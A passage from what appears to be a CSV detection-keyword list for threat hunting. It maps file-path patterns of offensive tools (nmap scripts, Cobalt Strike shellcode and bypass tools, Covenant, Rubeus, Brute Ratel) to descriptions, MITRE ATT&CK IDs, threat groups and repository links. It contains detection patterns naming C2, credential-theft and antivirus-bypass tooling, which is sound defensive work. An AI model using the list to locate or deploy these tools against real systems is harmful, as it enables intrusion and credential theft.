Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-novell-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ospf2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pc-anywhere.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pc-duo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pim-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pppoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-rip-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ripng-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-sonicwall-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-sybase-asa-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-tellstick-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-versant-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-wake-on-lan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-wpad-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Bropper.git*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*/bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*/Browser-C2*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - 
TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" +"*/Brute/BruteStager*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/bruteforce.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/bruteratel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/BruteSploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/brutespray/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BruteStager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/BucketLoot.git*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*/build/encrypted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/formatted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" 
+"*/build/shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/BuildBOFs/*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*/burp/releases/community/latest*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/burp-api/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/burp-Dirbuster*","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/vulnersCom/burp-Dirbuster","1","1","N/A","N/A","1","71","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z" +"*/burpee.py*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" +"*/BurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/burp-proxy*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/BurpSuite-collections*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*/BUYTHEAPTDETECTORNOW*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/byakugan.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/byakugan.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bypass.vbs*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Bypass/payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/bypass_mod/loader*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*/BypassAV/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" +"*/bypassAV-1/*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - 